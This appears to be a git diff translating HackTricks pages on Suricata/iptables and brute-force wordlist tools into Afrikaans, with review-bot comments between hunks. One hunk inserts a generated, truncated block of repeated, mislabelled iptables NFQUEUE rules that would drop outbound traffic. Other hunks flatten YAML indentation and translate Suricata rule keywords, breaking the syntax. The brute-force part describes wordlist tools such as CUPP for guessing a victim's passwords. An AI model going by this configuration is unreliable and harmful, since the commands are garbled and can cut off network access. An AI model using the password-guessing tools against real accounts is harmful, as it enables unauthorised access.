toegewy aan die regulering van uitgaande verbindinge. +Hierdie kettings verseker die ordelike verwerking van netwerkverkeer, wat die spesifikasie van gedetailleerde reëls moontlik maak wat die vloei van data in, deur en uit 'n stelsel beheer. ```bash # Delete all rules iptables -F 
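Review bot: the blank line between the `Output-ketting` bullet and `Hierdie kettings verseker ...` is dropped in this hunk, so that sentence becomes a lazy continuation of the last list item instead of the standalone paragraph it is in the source; reinstate the empty line. Two translation slips in the same passage: `lys van reëls wat kettings genoem word` should be plural (`lyste van reëls`), and `toestelle wat as roetingswerk optree` describes routers and should read `toestelle wat as roeteerders optree` (`ontvangste data` likewise should be `ontvangde data`).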
@@ -60,11 +59,324 @@ iptables-save > /etc/sysconfig/iptables ip6tables-save > /etc/sysconfig/ip6tables iptables-restore < /etc/sysconfig/iptables ``` - ## Suricata -### Install & Config +### Installeer & Konfigurasie +```bash +# Installeer Suricata +sudo apt-get install suricata + +# Skep 'n nuwe konfigurasie lêer +sudo cp /etc/suricata/suricata.yaml /etc/suricata/suricata.yaml.bak + +# Pas die konfigurasie lêer aan +sudo nano /etc/suricata/suricata.yaml + +# Stel die volgende waardes in: + - HOME_NET: jou_netwerk + - EXTERNAL_NET: enige + - RULES_DIR: /etc/suricata/rules + - LOG_DIR: /var/log/suricata/ + +# Stoor die veranderinge en sluit die lêer + +# Skep 'n nuwe reëls gids +sudo mkdir /etc/suricata/rules + +# Skep 'n nuwe reëls lêer +sudo touch /etc/suricata/rules/local.rules + +# Herlaai Suricata se konfigurasie +sudo suricata-update enable-source oisf/trafficid +sudo suricata-update update-sources +sudo suricata-update + +# Begin Suricata +sudo suricata -c /etc/suricata/suricata.yaml -i jou_interface +``` + +### Iptables + +```bash +# Skep 'n nuwe iptables reël +sudo iptables -A OUTPUT -p tcp --dport 80 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir HTTPS +sudo iptables -A OUTPUT -p tcp --dport 443 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir DNS +sudo iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir ICMP +sudo iptables -A OUTPUT -p icmp -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SSH +sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir RDP +sudo iptables -A OUTPUT -p tcp --dport 3389 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir FTP +sudo iptables -A OUTPUT -p tcp --dport 21 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir Telnet +sudo iptables -A OUTPUT -p tcp --dport 23 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SMTP +sudo iptables -A OUTPUT -p tcp --dport 25 -j 
NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir POP3 +sudo iptables -A OUTPUT -p tcp --dport 110 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IMAP +sudo iptables -A OUTPUT -p tcp --dport 143 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SNMP +sudo iptables -A OUTPUT -p udp --dport 161 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir NTP +sudo iptables -A OUTPUT -p udp --dport 123 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir MySQL +sudo iptables -A OUTPUT -p tcp --dport 3306 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir PostgreSQL +sudo iptables -A OUTPUT -p tcp --dport 5432 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir MSSQL +sudo iptables -A OUTPUT -p tcp --dport 1433 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir Oracle +sudo iptables -A OUTPUT -p tcp --dport 1521 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir VNC +sudo iptables -A OUTPUT -p tcp --dport 5900 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SMB +sudo iptables -A OUTPUT -p tcp --dport 445 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir LDAP +sudo iptables -A OUTPUT -p tcp --dport 389 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir FTPS +sudo iptables -A OUTPUT -p tcp --dport 990 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir SFTP +sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 6667 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir Rsync +sudo iptables -A OUTPUT -p tcp --dport 873 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir DNSSEC +sudo iptables -A OUTPUT -p tcp --dport 853 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir DHCP +sudo iptables -A OUTPUT -p udp --dport 67:68 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 194 -j 
NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 6660:6669 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 7000 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 8000 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9000 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9001 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9009 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9010 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9020 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9030 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9040 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9050 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9060 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9070 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9080 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9090 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9100 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9110 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9120 -j NFQUEUE 
--queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9130 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9140 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9150 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9160 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9170 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9180 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9190 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9200 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9210 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9220 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9230 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9240 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9250 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9260 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9270 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9280 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9290 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9300 -j NFQUEUE --queue-num 1 + +# 
Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9310 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9320 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9330 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9340 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9350 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9360 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9370 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9380 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9390 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9400 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9410 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9420 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9430 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9440 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9450 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9460 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9470 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9480 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe 
iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9490 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9500 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9510 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9520 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9530 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9540 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9550 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9560 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9570 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9580 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9590 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9600 -j NFQUEUE -- ```bash # Install details from: https://suricata.readthedocs.io/en/suricata-6.0.0/install.html#install-binary-packages # Ubuntu @@ -74,7 +386,7 @@ apt-get install suricata # Debian echo "deb http://http.debian.net/debian buster-backports main" > \ - /etc/apt/sources.list.d/backports.list +/etc/apt/sources.list.d/backports.list apt-get update apt-get install suricata -t buster-backports 
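Review bot: everything in the @@ -60 hunk between `### Installeer & Konfigurasie` and the truncated `sudo iptables -A OUTPUT -p tcp --dport 9600 -j NFQUEUE --` is generated text with no counterpart on the `-` side (the removed lines are only the blank line and the `### Install & Config` heading), and its last code fence is never closed, so the original bash fence that follows ends the generated block and flips code and prose for the remainder of the file; delete the inserted block and keep just the heading translation. The content is also wrong in ways a reader would copy: the `### Iptables` block repeats `-j NFQUEUE --queue-num 1` for dozens of ports labelled `IRC` (8000, 9000 to 9600 in steps of ten) and mislabels others (`--dport 853` is DNS over TLS, not `DNSSEC`; `--dport 22` appears twice, as SSH and as `SFTP`), and steering OUTPUT traffic into NFQUEUE before Suricata is attached to that queue drops those packets by default, since iptables only lets them through when a listener exists or `--queue-bypass` is set. The YAML fragment under `# Stel die volgende waardes in:` sits inside a bash block where it is not executable, and the `sudo suricata-update enable-source oisf/trafficid` steps are not part of the procedure the original section documents.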
@@ -90,11 +402,11 @@ suricata-update ## To use the dowloaded rules update the following line in /etc/suricata/suricata.yaml default-rule-path: /var/lib/suricata/rules rule-files: - - suricata.rules +- suricata.rules # Run ## Add rules in /etc/suricata/rules/suricata.rules -systemctl suricata start +systemctl suricata start suricata -c /etc/suricata/suricata.yaml -i eth0 @@ -102,7 +414,7 @@ suricata -c /etc/suricata/suricata.yaml -i eth0 suricatasc -c ruleset-reload-nonblocking ## or set the follogin in /etc/suricata/suricata.yaml detect-engine: - - rule-reload: true +- rule-reload: true # Validate suricata config suricata -T -c /etc/suricata/suricata.yaml -v @@ -111,8 +423,8 @@ suricata -T -c /etc/suricata/suricata.yaml -v ## Config drop to generate alerts ## Search for the following lines in /etc/suricata/suricata.yaml and remove comments: - drop: - alerts: yes - flows: all +alerts: yes +flows: all ## Forward all packages to the queue where suricata can act as IPS iptables -I INPUT -j NFQUEUE 
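Review bot: the @@ -74, @@ -90, @@ -102 and @@ -111 hunks strip leading whitespace from lines that the cheatsheet shows verbatim as file contents, which changes their meaning: `- suricata.rules` is no longer nested under `rule-files:`, `- rule-reload: true` is no longer under `detect-engine:`, and the `drop:` key is removed outright while `alerts: yes` and `flows: all` are flattened to top level, so a reader following "search for the following lines in /etc/suricata/suricata.yaml" is now shown a structure that does not match the file. Keep the original indentation in all four places. The shell continuation `echo "..." > \` followed by `/etc/apt/sources.list.d/backports.list` still works without the indent but should keep it for consistency. Since the `systemctl suricata start` line is touched anyway (whitespace only), this is the moment to fix its pre-existing argument order to `systemctl start suricata`.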
@@ -130,76 +442,70 @@ Type=simple systemctl daemon-reload ``` +### Reëlsdefinisies -### Rules Definitions - -[From the docs:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) A rule/signature consists of the following: - -* The **action**, determines what happens when the signature matches. -* The **header**, defines the protocol, IP addresses, ports and direction of the rule. -* The **rule options**, define the specifics of the rule. +[Van die dokumentasie:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) 'n Reël/handtekening bestaan uit die volgende: +* Die **aksie**, bepaal wat gebeur wanneer die handtekening ooreenstem. +* Die **kop**, definieer die protokol, IP-adresse, poorte en rigting van die reël. +* Die **reël-opsies**, definieer die spesifieke van die reël. ```bash alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HTTP GET Request Containing Rule in URI"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"rule"; fast_pattern; classtype:bad-unknown; sid:123; rev:1;) ``` +#### **Geldig aksies is** -#### **Valid actions are** +* waarskuwing - genereer 'n waarskuwing +* slaag - stop verdere inspeksie van die pakkie +* **verwerp** - verwerp pakkie en genereer waarskuwing +* **afwys** - stuur RST/ICMP onbereikbare fout na die sender van die ooreenstemmende pakkie. +* verwerpbron - dieselfde as net _afwys_ +* verwerpdoel - stuur RST/ICMP foutpakkie na die ontvanger van die ooreenstemmende pakkie. +* verwerpbeide - stuur RST/ICMP foutpakkies na beide kante van die gesprek. -* alert - generate an alert -* pass - stop further inspection of the packet -* **drop** - drop packet and generate alert -* **reject** - send RST/ICMP unreachable error to the sender of the matching packet. -* rejectsrc - same as just _reject_ -* rejectdst - send RST/ICMP error packet to the receiver of the matching packet. -* rejectboth - send RST/ICMP error packets to both sides of the conversation. 
+#### **Protokolle** -#### **Protocols** - -* tcp (for tcp-traffic) +* tcp (vir tcp-verkeer) * udp * icmp -* ip (ip stands for ‘all’ or ‘any’) -* _layer7 protocols_: http, ftp, tls, smb, dns, ssh... (more in the [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)) +* ip (ip staan vir 'alles' of 'enige') +* _laag7-protokolle_: http, ftp, tls, smb, dns, ssh... (meer in die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)) -#### Source and Destination Addresses +#### Bron- en Bestemmingsadressering -It supports IP ranges, negations and a list of addresses: +Dit ondersteun IP-reekse, negasies en 'n lys van adresse: -| Example | Meaning | +| Voorbeeld | Betekenis | | ------------------------------ | ---------------------------------------- | -| ! 1.1.1.1 | Every IP address but 1.1.1.1 | -| !\[1.1.1.1, 1.1.1.2] | Every IP address but 1.1.1.1 and 1.1.1.2 | -| $HOME\_NET | Your setting of HOME\_NET in yaml | -| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET and not HOME\_NET | -| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 except for 10.0.0.5 | +| ! 
1.1.1.1 | Elke IP-adres behalwe 1.1.1.1 | +| !\[1.1.1.1, 1.1.1.2] | Elke IP-adres behalwe 1.1.1.1 en 1.1.1.2 | +| $HOME\_NET | Jou instelling van HOME\_NET in yaml | +| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET en nie HOME\_NET | +| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 behalwe vir 10.0.0.5 | -#### Source and Destination Ports +#### Bron- en Bestemmingspoorte -It supports port ranges, negations and lists of ports +Dit ondersteun poortreeks, negasies en lys van poorte -| Example | Meaning | +| Voorbeeld | Betekenis | | --------------- | -------------------------------------- | -| any | any address | -| \[80, 81, 82] | port 80, 81 and 82 | -| \[80: 82] | Range from 80 till 82 | -| \[1024: ] | From 1024 till the highest port-number | -| !80 | Every port but 80 | -| \[80:100,!99] | Range from 80 till 100 but 99 excluded | -| \[1:80,!\[2,4]] | Range from 1-80, except ports 2 and 4 | +| enige | enige adres | +| \[80, 81, 82] | poort 80, 81 en 82 | +| \[80: 82] | Reeks van 80 tot 82 | +| \[1024: ] | Vanaf 1024 tot die hoogste poortnommer | +| !80 | Elke poort behalwe 80 | +| \[80:100,!99] | Reeks van 80 tot 100 maar 99 uitgesluit | +| \[1:80,!\[2,4]] | Reeks van 1-80, behalwe poorte 2 en 4 | -#### Direction - -It's possible to indicate the direction of the communication rule being applied: +#### Rigting +Dit is moontlik om die rigting van die kommunikasiereël aan te dui wat toegepas word: ``` source -> destination source <> destination (both directions) ``` +#### Sleutelwoorde -#### Keywords - -There are **hundreds of options** available in Suricata to search for the **specific packet** you are looking for, here it will be mentioned if something interesting is found. Check the [**documentation** ](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)for more! - +Daar is **honderde opsies** beskikbaar in Suricata om te soek na die **spesifieke pakkie** waarna jy soek, hier sal genoem word as iets interessant gevind word. 
Kyk na die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html) vir meer inligting! ```bash # Meta Keywords msg: "description"; #Set a description to the rule @@ -240,15 +546,14 @@ drop tcp any any -> any any (msg:"regex"; pcre:"/CTF\{[\w]{3}/i"; sid:10001;) ## Drop by port drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;) ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
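Review bot: the Suricata keywords in the "Geldig aksies is" list and the ports table are rule syntax and must not be translated; `alert`, `pass`, `drop`, `reject`, `rejectsrc`, `rejectdst`, `rejectboth` and `any` have to stay verbatim (translate only the explanation after the dash), otherwise a reader who copies "verwerp" or "enige" into a rule gets a parse error. The mapping is also inconsistent within the hunk: `drop` becomes "verwerp", `reject` becomes "afwys", yet `rejectsrc` becomes "verwerpbron" while its explanation says "dieselfde as net _afwys_". Suggested form: `* drop - laat die pakkie val en genereer 'n waarskuwing`, `* rejectsrc - dieselfde as net _reject_`. The heading should read "Geldige aksies is".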
diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md index 297231576..19fef1846 100644 --- a/generic-methodologies-and-resources/brute-force.md +++ b/generic-methodologies-and-resources/brute-force.md @@ -1,30 +1,30 @@ -# Brute Force - CheatSheet +# Brute Force - Spiekbrief
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Default Credentials +## Standaardlegitimasie -**Search in google** for default credentials of the technology that is being used, or **try these links**: +**Soek in Google** vir standaardlegitimasie van die tegnologie wat gebruik word, of **probeer hierdie skakels**: * [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html) @@ -39,12 +39,11 @@ Other ways to support HackTricks: * [**https://many-passwords.github.io/**](https://many-passwords.github.io) * [**https://theinfocentric.com/**](https://theinfocentric.com/) -## **Create your own Dictionaries** +## **Skep jou eie Woordeboeke** -Find as much information about the target as you can and generate a custom dictionary. Tools that may help: +Vind soveel moontlike inligting oor die teiken en genereer 'n aangepaste woordeboek. Hulpmiddels wat kan help: ### Crunch - ```bash crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst) 
@@ -55,47 +54,42 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars ^ Special characters including spac crunch 6 8 -t ,@@^^%% ``` - ### Cewl +Cewl is 'n hulpmiddel wat gebruik word om woordlyste te skep deur webwerwe te skandeer vir sleutelwoorde. Dit kan gebruik word vir aanvalle soos brute force en woordeboekaanvalle. Cewl kan ook gebruik word om sosiale media-profiels te analiseer en inligting te versamel oor 'n teiken persoon. Dit is 'n kragtige hulpmiddel vir inligtingversameling en kan 'n waardevolle bron wees vir 'n hacker. ```bash cewl example.com -m 5 -w words.txt ``` - ### [CUPP](https://github.com/Mebus/cupp) -Generate passwords based on your knowledge of the victim (names, dates...) - +Genereer wagwoorde gebaseer op jou kennis van die slagoffer (name, datums...) ``` python3 cupp.py -h ``` - ### [Wister](https://github.com/cycurity/wister) -A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target. - +'n Woordelys-generator-hulpmiddel wat jou in staat stel om 'n stel woorde te voorsien, wat jou die moontlikheid gee om verskeie variasies van die gegee woorde te skep, en sodoende 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken. 
